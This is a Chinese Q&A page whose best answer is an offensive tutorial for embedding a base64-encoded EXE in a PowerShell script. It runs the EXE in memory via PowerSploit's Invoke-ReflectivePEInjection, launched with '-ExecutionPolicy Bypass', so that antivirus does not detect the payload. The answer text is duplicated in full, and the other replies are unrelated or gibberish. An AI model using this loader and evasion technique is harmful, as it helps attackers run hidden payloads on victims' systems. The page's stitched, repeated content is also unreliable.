如何在PowerShell脚本中嵌入EXE文件
答案:3 悬赏:0 手机版
解决时间 2021-02-25 20:23
- 提问者网友:城市野鹿
- 2021-02-24 23:57
如何在PowerShell脚本中嵌入EXE文件
最佳答案
- 五星知识达人网友:末日狂欢
- 2021-02-25 00:18
我在尝试解决一个问题,即在客户端攻击中只使用纯 PowerShell 脚本作为攻击负荷。使用 PowerShell 运行恶意代码具有很多优点,包括:
1.无需在目标上安装其他任何东西。
2.强大的引擎(例如可以直接调用 .NET 代码)。
3.可以使用 base64 编码命令来混淆恶意命令,使恶意命令变的不容易被发现。这同样也是一种可以避免使用特殊字符的方法,尤其是在一个涉及多个步骤需要分离不同攻击负荷的高级攻击中。
4.可以使用Invoke-Expression将字符串解释为 Powershell
命令。从渗透测试的角度看,这可以避免在目标磁盘上编写复杂的脚本。例如:你可以使用 Powershell 下载额外的复杂脚本,然后通过调用
Invoke-Expression 解释并执行下载到内存中的脚本。这个过程同样可以躲避杀毒软件的查杀。
我们想在目标上运行一些相当复杂的功能,这些功能常是 EXE 文件的一部分。我不想直接在目标上放置一个二进制文件,因为这样可能会触发反病毒机制。所以我想将其放入 Powershell 脚本中,不过我也不想重写整个 Powershell 脚本。
最终我想到一个办法。
将二进制文件嵌入到 Powershell 脚本中,并直接通过脚本运行而不用将其写入到磁盘里。
下面演示解决步骤:
1.将二进制文件进行 base64 编码
可以使用以下函数:
function Convert-BinaryToString {
[CmdletBinding()] param (
[string] $FilePath
)
try {
$ByteArray = [System.IO.File]::ReadAllBytes($FilePath);
}
catch {
throw "Failed to read file. Ensure that you have permission to the file, and that the file path is correct.";
}
if ($ByteArray) {
$Base64String = [System.Convert]::ToBase64String($ByteArray);
}
else {
throw '$ByteArray is $null.';
}
Write-Output -InputObject $Base64String;
}
2. 按如下过程创建一个新的脚本
1.用上一步的方法将 EXE 文件转为字符串;
2.准备 Invoke-ReflectivePEInjection(Powersploit project 的一部分);
3.将字符串转为字节数组;
4.调用 Invoke-ReflectivePEInjection。
所以,二进制文件只是 Powershell 脚本中的一段字符串,在将字符串解码为二进制数组后,就可以调用 Invoke-ReflectivePEInjection 直接在内存中运行。
最后看起来像这样:
# base64 编码的二进制文件
$InputString = '...........'
function Invoke-ReflectivePEInjection
{
......
......
......
}
# 将二进制字符串转为字节数组
$PEBytes = [System.Convert]::FromBase64String($InputString)
# 在内存中运行 EXE
Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4"
现在就可以在目标上运行脚本了:
powershell -ExecutionPolicy Bypass -File payload.ps1
根据嵌入的不同二进制文件,可能会出现以下错误:
PE platform doesn’t match the architecture of the process it is being loaded in (32/64bit)
解决这个问题只需要运行 32 位的 PowerShell 即可。
下面是我将 plink.exe 嵌入 payload.ps1 的例子:
1.无需在目标上安装其他任何东西。
2.强大的引擎(例如可以直接调用 .NET 代码)。
3.可以使用 base64 编码命令来混淆恶意命令,使恶意命令变的不容易被发现。这同样也是一种可以避免使用特殊字符的方法,尤其是在一个涉及多个步骤需要分离不同攻击负荷的高级攻击中。
4.可以使用Invoke-Expression将字符串解释为 Powershell
命令。从渗透测试的角度看,这可以避免在目标磁盘上编写复杂的脚本。例如:你可以使用 Powershell 下载额外的复杂脚本,然后通过调用
Invoke-Expression 解释并执行下载到内存中的脚本。这个过程同样可以躲避杀毒软件的查杀。
我们想在目标上运行一些相当复杂的功能,这些功能常是 EXE 文件的一部分。我不想直接在目标上放置一个二进制文件,因为这样可能会触发反病毒机制。所以我想将其放入 Powershell 脚本中,不过我也不想重写整个 Powershell 脚本。
最终我想到一个办法。
将二进制文件嵌入到 Powershell 脚本中,并直接通过脚本运行而不用将其写入到磁盘里。
下面演示解决步骤:
1.将二进制文件进行 base64 编码
可以使用以下函数:
function Convert-BinaryToString {
[CmdletBinding()] param (
[string] $FilePath
)
try {
$ByteArray = [System.IO.File]::ReadAllBytes($FilePath);
}
catch {
throw "Failed to read file. Ensure that you have permission to the file, and that the file path is correct.";
}
if ($ByteArray) {
$Base64String = [System.Convert]::ToBase64String($ByteArray);
}
else {
throw '$ByteArray is $null.';
}
Write-Output -InputObject $Base64String;
}
2. 按如下过程创建一个新的脚本
1.用上一步的方法将 EXE 文件转为字符串;
2.准备 Invoke-ReflectivePEInjection(Powersploit project 的一部分);
3.将字符串转为字节数组;
4.调用 Invoke-ReflectivePEInjection。
所以,二进制文件只是 Powershell 脚本中的一段字符串,在将字符串解码为二进制数组后,就可以调用 Invoke-ReflectivePEInjection 直接在内存中运行。
最后看起来像这样:
# base64 编码的二进制文件
$InputString = '...........'
function Invoke-ReflectivePEInjection
{
......
......
......
}
# 将二进制字符串转为字节数组
$PEBytes = [System.Convert]::FromBase64String($InputString)
# 在内存中运行 EXE
Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "Arg1 Arg2 Arg3 Arg4"
现在就可以在目标上运行脚本了:
powershell -ExecutionPolicy Bypass -File payload.ps1
根据嵌入的不同二进制文件,可能会出现以下错误:
PE platform doesn’t match the architecture of the process it is being loaded in (32/64bit)
解决这个问题只需要运行 32 位的 PowerShell 即可。
下面是我将 plink.exe 嵌入 payload.ps1 的例子:
全部回答
- 1楼网友:梦中风几里
- 2021-02-25 01:45
算是出完了也算是没出完,波西杰克逊-奥林匹斯英雄系列出完了,然而。2016年会出叫Apollo的系列,第一部叫The Hidden Oracle 列一下已出的书,有译本的用中文没有的用英文 主要部分: 波西杰克逊与神火之盗 波西杰克逊与魔兽之海 波西杰克逊与巨...
- 2楼网友:十鸦
- 2021-02-25 01:36
我们要辟胀欺侮瓢督
我要举报
如以上问答信息为低俗、色情、不良、暴力、侵权、涉及违法等信息,可以点下面链接进行举报!
大家都在看
推荐资讯